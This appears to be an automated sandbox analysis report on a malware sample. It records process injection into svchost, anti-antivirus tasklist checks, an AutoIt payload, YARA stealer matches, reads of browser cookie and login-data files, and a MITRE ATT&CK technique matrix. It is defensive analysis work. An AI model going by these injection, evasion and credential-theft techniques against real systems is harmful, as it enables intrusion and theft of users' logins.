                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2546EDA0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F19B270000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2247D540000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FACA2E0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20DD2150000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20FF8E60000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15D2F8D0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B1B6A70000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DE8B200000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 177E4700000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21DF3F60000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA9CDA0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15A6D5A0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AA43AE0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22B79F90000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23084F60000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 266FF740000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 185E70A0000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25BE1B40000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifMemory written: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 6EDA0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B270000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 7D540000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: CA2E0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: D2150000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: F8E60000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 2F8D0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: B6A70000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 8B200000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: E4700000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: F3F60000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 9CDA0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 6D5A0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 43AE0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 79F90000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 84F60000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: FF740000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: E70A0000
                Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: E1B40000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2546EDA0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F19B270000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2247D540000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1FACA2E0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 20DD2150000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 20FF8E60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 15D2F8D0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2B1B6A70000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DE8B200000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 177E4700000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 21DF3F60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA9CDA0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 15A6D5A0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1AA43AE0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 22B79F90000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 23084F60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 266FF740000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 185E70A0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 25BE1B40000
                Source: C:\Windows\System32\svchost.exeThread register set: target process: 1572
                Source: C:\Windows\System32\svchost.exeThread register set: 1572 25400000000
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E7F2C0 GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,13_2_00E7F2C0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AvastUI.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "avastui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AVGUI.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "avgui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^xAuYKKZEsy$" Similarly.wms Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Fuck.exe.pif h Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 7960 -ip 7960
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7960 -s 272
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2776 -ip 2776
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 856
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3452 -ip 3452
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exeProcess created: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe "C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" -burn.filehandle.attached=636 -burn.filehandle.self=644 /install /quiet /norestart
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeProcess created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe "C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{F7864B24-BD58-4321-8DAF-90AD3F7AED80} {2D0A5E22-0BB0-4C91-8FDC-D5C3E4413F94} 8120
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspService
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC188B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00EC188B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EA2C9D KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00EA2C9D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECEADB mouse_event,13_2_00ECEADB
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_0040180E LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,1_2_0040180E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC11EC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00EC11EC
                Source: Fuck.exe.pifBinary or memory string: Shell_TrayWnd
                Source: l39HA25qjw.exe, 00000001.00000003.42209492506.00000000067F4000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 0000000D.00000000.42239326560.0000000000EFD000.00000002.00000001.01000000.00000006.sdmp, Fuck.exe.pif, 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd%s-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTR
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeQueries volume information: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\logo.png VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E80918 cpuid 13_2_00E80918
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00407105 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00407105
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E9BBD2 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,13_2_00E9BBD2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EBE346 GetUserNameW,13_2_00EBE346
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00402BF2 GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,1_2_00402BF2

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Windows\System32\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite.db
                Source: find.exe, 0000000B.00000002.42233391082.0000000002510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.DMLnyt.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.0.DMLnyt.dc0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000025.00000000.42883902273.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42853008071.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42891674911.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42849307207.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.42914885641.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42845405706.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.42841451555.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Fuck.exe.pif PID: 7152, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, type: DROPPED
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.db
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite.db-shm
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data.db
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite.db-wal
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.db
                Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite.db
                Source: Fuck.exe.pifBinary or memory string: WIN_81
                Source: Fuck.exe.pifBinary or memory string: WIN_XP
                Source: Fuck.exe.pif, 00000014.00000000.42570283343.0000000000F23000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Fuck.exe.pifBinary or memory string: WIN_XPe
                Source: Fuck.exe.pifBinary or memory string: WIN_VISTA
                Source: Fuck.exe.pifBinary or memory string: WIN_7
                Source: Fuck.exe.pifBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EE205F socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00EE205F
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EE1A5D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,13_2_00EE1A5D
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                2
                Valid Accounts
                11
                Windows Management Instrumentation
                1
                LSASS Driver
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium14
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default Accounts2
                Native API
                11
                DLL Side-Loading
                1
                LSASS Driver
                11
                Deobfuscate/Decode Files or Information
                1
                Network Sniffing
                1
                Account Discovery
                Remote Desktop Protocol2
                Man in the Browser
                Exfiltration Over Bluetooth21
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts12
                Command and Scripting Interpreter
                2
                Valid Accounts
                11
                DLL Side-Loading
                3
                Obfuscated Files or Information
                21
                Input Capture
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                Automated Exfiltration11
                Non-Standard Port
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts1
                Scheduled Task/Job
                11
                Windows Service
                2
                Valid Accounts
                1
                Install Root Certificate
                NTDS1
                Network Sniffing
                Distributed Component Object Model21
                Input Capture
                Scheduled Transfer4
                Non-Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCron1
                Scheduled Task/Job
                21
                Access Token Manipulation
                14
                Software Packing
                LSA Secrets38
                System Information Discovery
                SSH2
                Clipboard Data
                Data Transfer Size Limits125
                Application Layer Protocol
                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchd11
                Registry Run Keys / Startup Folder
                11
                Windows Service
                1
                Timestomp
                Cached Domain Credentials351
                Security Software Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup Items612
                Process Injection
                11
                DLL Side-Loading
                DCSync23
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/Job1
                Scheduled Task/Job
                121
                Masquerading
                Proc Filesystem4
                Process Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)11
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                /etc/passwd and /etc/shadow11
                Application Window Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Modify Registry
                Network Sniffing3
                System Owner/User Discovery
